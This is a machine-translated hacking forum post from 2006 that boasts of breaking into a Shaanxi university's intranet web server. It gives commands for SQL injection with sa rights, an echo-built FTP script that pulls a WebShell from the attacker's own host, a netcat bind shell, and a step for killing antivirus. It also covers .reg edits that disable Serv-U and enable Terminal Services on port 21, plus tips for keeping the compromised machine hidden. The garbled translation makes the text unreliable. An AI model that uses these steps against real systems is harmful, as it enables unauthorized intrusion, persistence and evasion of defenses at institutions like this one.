Tricks of the trade of the invasion of Shaanxi, a University intranet-vulnerability warning-the black bar safety net

ID MYHACK58:6220066250
Type myhack58
Reporter 佚名
Modified 2006-01-10T00:00:00


Recently black anti above there are many ways to invade College website to the article, mostly for the injection attack. Oh, in order to cater to the mass the trend, I also entered some of the University websites play a Play. Not, this time it found a Shaanxi College inside a site of injection vulnerabilities, but acquiring the highest authority really took a turn strength. The first step: find the injection vulnerability In one of its news display pages of the coupling plus a"'", Oh, can be injected into it! See what are permissions, and later on added A and user>0

The display has a dbo of the word, Halo, I can have SA permissions, alas, really do not know the administrator is wrong with it! First regardless of these, come up with bright kid's domain,now version to 3. 5. and other injection tool compared to the domain with still more smoothly, but the command echo a little worse) on.

Since the discovery of the injection point, then get to work!

Second step: Upload File Now that has sa permissions, then you can execute administrator privilege commands. However, because the General tools of the echo is very bad, at least I used to NBSI,domain, etc. all have this problem, so to get a WebShell up to say it. First need to find the web root directory, or the WebShell where? In the domain of command-line multi-dir several times can be found, according to the General habit, the root directory is not too deep, take the file name and the web site how much a little relationship. Estimated not a few administrators will take the root directory name made it weird and put in the hierarchy is very deep where it is administrators all have a common problem, for fear of trouble, the figure is convenient, but the convenience of their own is also convenient for us, Hey Hey on. Soon you can find the root directory for d:/ccs the.

Then upload WebShell! However that several of the injection tool of the uploading features are a bit of a problem, either transfer small files no problem, pass big to die for! Either don't pass-up, ready-made tool can't upload, what to do? Not afraid not afraid, not in a tree hanged! With ftp download! In the domain of the command line followed by the input of the following statement:

echo open showff. 5 1. net>>c:\ftp echo showff>>c:\ftp echo 1 2 3 4 5 6>>c:\ftp echo cd public_html>>c:\ftp echo the get WebShell. asp d:\ccs\index_admin.asp>>c:\ftp echo bye>>c:\ftp

Of course, first you have to have an FTP space, I used the tiger wing of the FTP, the speed is very fast. So in the server c on the disc will generate a name ftp File content is just input the stuff. The command line input of ftp-s:c:\ftp,click on execute, such a WebShell download to our cute chickens. Browser enter the address of the view into our WebShell to go inside, we download the marine 2 0 0 6, powerful, easy to use.

Until now, if you just want to activity WebShell words seem to suffice, Hai Duong, the WebShell can dry a lot of things. But our goal was further to obtain greater privileges.

Third step: the Italian job replacement services With a WebShell Upload a nc, and then in the domain of the command line inside the implementation of nc-e cmd.exe –l –p 4 3 9 5 8,on your own computer to perform telnet xxx. xxx. edu. cn 4 3 9 5 8 There is no response, the display is”cannot connect to host”such words. Very good, very normal, the server there is no antivirus and firewall software no. In order to further confirm this point, in the domain inside a perform a netstat –a,according to the return results I telnet a few open ports.

8 0 port and the 2 for 1 port open, and accessible to, the other port can't use! Then use pslist and pskill to put the related antivirus and firewall off to chant now! Oh, of course I do, but in fact not so simple. This server although there are rising firewall, but turned off after again when I telnet far from the nc when no reaction, why is this? (Meditating for a few seconds)Oh, actually very simple, because this is a school inside the internal Web site, probably in this server around there are other types of firewall or gateway or anything like that, only allow external access to this server of 8 0 and 2 1 ports. But 8 0 and 2 1 ports are occupied, don't we can't use our own Trojan or acquisition 3 3 8 9 remote control? Non-too! I look to cast tricks of the trade big law! First we have to realize that 8 0 port must exist or will soon be found to be black, so can only take 2 1 Port to start with. Generally only the administrator to use the file upload only, temporarily can not be found. With the net start command to view the found each other using the Serv-UFTP server. Step one: try to make the Serv-U service is prohibited, so that it can't boot automatically run and occupies 2 1-port. The method is as follows: edit a reg file, the content is as follows: REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Serv-U] "Start"=dword:0 0 0 0 0 0 0 4

Note that REGEDIT4 below to have an empty row. Start of 2 is auto, 3 is manual and 4 is prohibited. This and services inside the setting is one to one. Save it as a. reg file with the WebShell is uploaded to the server d:/ccs/index/a. reg, using the domain to run the regedit /s d:/ccs/index/a.reg such a Serv-U service is disabled. Then use in the domain use the command net stop serv-u to an existing ftp process off. Step two: modify the Terminal Telnet port number. The original is 3 3 8 9, now to be changed to 2 to 1. You can edit the registry to modify, you can directly run the 3 3 8 9 Port to modify the controller like this app. I use x3389 program modifications. Upload directly to the server, 在domain里面执行x3389.exe 2 1 can. Then try to open 3 3 8 9 services, there are many online this method, here not say. If you want to make Terminal Services always boot to run automatically, also you need to edit a reg file content is as follows: REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] "Start"=dword:0 0 0 0 0 0 0 2

Save for b. reg, upload server and run the regedit /s d:/ccs/index/b.reg the. If you smack open the Terminal Services trouble, simply directly pass a Radmin, or other remote control software to set the port for 2 1 Do not have to? Step three: restart the server. Upload a reboot tool, perform the restart. This is for Terminal Services required. If you use the other Trojan can not be considered a restart. After the restart, with domain running net start ,find Serv-U is gone, huh! Well, now you can swagger into the server! Here I just uploaded a nc try the effect, the execution of the command for nc –e cmd.exe –l –p 2 1, and then in the local implementation of telnet xxx. xxx. edu. cn 2 1, and returns the result.

Summary: In fact, as long as the original FTP ban, empty out 2 1 port, that other things also well done. The main is the beginning of how to perceive it around the firewall and allowed to pass through the port. Knowing this, the server is also not any of our fish? Of course, in order to ensure that the broiler of the long-term stability and not to be found, it is best to use the tunnel technology by